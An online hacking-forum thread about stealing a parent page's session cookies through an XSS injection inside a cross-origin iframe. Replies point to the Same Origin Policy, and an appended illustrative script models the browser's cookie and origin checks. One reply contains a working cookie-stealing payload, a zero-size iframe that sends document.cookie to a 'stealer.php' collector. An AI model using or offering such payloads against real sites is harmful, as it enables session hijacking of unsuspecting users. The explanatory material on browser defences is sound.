
Obtaining parent cookies from an iframe


ghost's Avatar
0 0

I am working on some cookie stealing. I have found where to do the XSS injection, and I have got the PHP and JS written up properly. It works fine. The problem is, it is returning the cookie saved by the iframe, not the parent document. Is there even a way to access this cookie? My best find was someone using parent.document.cookie, but I couldn't get that to work. A nudge in the right direction would be extremely appreciated.

By the way, this is just some white hat for a friend. Nothing illegal.


ghost's Avatar
0 0

<iframe height='0' width='0' src="javascript:document.location='site.com/stealer.php?cookie=' + document.cookie;"></iframe>

I really doubt if anyone here cares if it's 'white' or 'black' hat…


ghost's Avatar
0 0

zbert, thanks for the reply. However, that appears to only deal with cross-subdomain cookies.

xof, thank you for being entirely unhelpful. Reading is useful.

I should clarify my problem a bit further. The injection point is inside the iframe. The iframe is stored on an entirely different server. It does not even have the same domain name. When it returns the cookie and saves it, it returns the PHPSESSID that the iframe is storing. I want it to return and save the cookie of the parent document that the iframe is stored on, as that is the one with the main site's session data.


ghost's Avatar
0 0

…Well now that you've finally worded your question correctly:

It's not possible to steal cookies that way unless the different servers are actually set up to interact with one another in the correct manner.

Look at this link (took me about two seconds to find by searching 'cookies from another domain' in google): http://www.15seconds.com/issue/971108.htm The examples are in ASP, but you should get the gist.

So what you're saying is that if I find an XSS hole in hellboundhackers.org, I can then get the cookies from paypal.com

If this was true, everyone would be screwed.

Nice try though.


ghost's Avatar
0 0

xof wrote: …Well now that you've finally worded your question correctly:

It's not possible to steal cookies that way unless the different servers are actually set up to interact with one another in the correct manner.

Look at this link (took me about two seconds to find by searching 'cookies from another domain' in google): http://www.15seconds.com/issue/971108.htm The examples are in ASP, but you should get the gist.

So what you're saying is that if I find an XSS hole in hellboundhackers.org, I can then get the cookies from paypal.com

If this was true, everyone would be screwed.

Nice try though.

"The problem is, it is returning the cookie saved by the iframe, not the parent document."

Oh, because that doesn't make it clear the document.cookie DOESN'T WORK. If you are going to be an ass, at least admit you were wrong. The pages are linked and do communicate with each other and modify each other's data. That link was surprisingly useful. I was searching more for parent to child and less about cross domain, which is why I did not find it.

Just a heads-up: I have no problem with you being an ass. You should probably do two things, though.

  1. Admit it when you messed up. You just look dumb when you try and cover it up.
  2. Study a few of MoshBat's posts when he is annoying people. You will see he actually has fun. Try actually having fun while being an ass instead of just being an ass for no reason.

spyware's Avatar
Banned
0 0

Same Origin Policy. The guy wasn't an ass, btw.


ghost's Avatar
0 0

spyware wrote: Same Origin Policy. The guy wasn't an ass, btw.

Ah, thanks. That is quite helpful. Eh, I have a pretty broad definition of ass. Not reading my post and then blaming me for it makes him an ass in my book. Most people on the internet fit into my definition. Maybe I should consider changing it.
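
Added example (not part of the original thread): a simplified JavaScript model of the browser checks behind the "Same Origin Policy" answer above, showing why script in a cross-origin iframe sees only the iframe host's own cookies and why HttpOnly hides a cookie from script even on the same origin. The hostnames, cookie values and function names are constructed for illustration, and cookie path matching is left out.

```javascript
// Simplified model of browser behaviour; all names and values are constructed.

// Same-Origin Policy: script may touch another window's document only when
// scheme, host and port all match. URL.origin serializes exactly that tuple.
function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

// RFC 6265 section 5.1.3 domain matching (IP-address hosts ignored for brevity).
function domainMatches(host, cookie) {
  if (cookie.hostOnly) return host === cookie.domain;
  return host === cookie.domain || host.endsWith('.' + cookie.domain);
}

// What document.cookie returns to script running in a document at docUrl.
function scriptVisibleCookies(docUrl, jar) {
  const { hostname, protocol } = new URL(docUrl);
  return jar
    .filter((c) => domainMatches(hostname, c))
    .filter((c) => !c.httpOnly) // HttpOnly cookies are never exposed to script
    .filter((c) => !c.secure || protocol === 'https:')
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// What script in a frame gets when it evaluates parent.document.cookie.
function readParentCookies(frameUrl, parentUrl, jar) {
  if (!sameOrigin(frameUrl, parentUrl)) {
    throw new Error('SecurityError: blocked cross-origin frame access');
  }
  return scriptVisibleCookies(parentUrl, jar);
}

// Constructed cookie jar: the parent site and the framed host each set a PHPSESSID.
const jar = [
  { name: 'PHPSESSID', value: 'parent-session', domain: 'main.example', hostOnly: true, httpOnly: false, secure: false },
  { name: 'auth', value: 'token', domain: 'main.example', hostOnly: false, httpOnly: true, secure: true },
  { name: 'PHPSESSID', value: 'frame-session', domain: 'widget.example', hostOnly: true, httpOnly: false, secure: false },
];
const PARENT = 'https://main.example/page';
const FRAME = 'https://widget.example/embed';

// Script in the frame sees only the frame host's cookie.
console.log(scriptVisibleCookies(FRAME, jar));
```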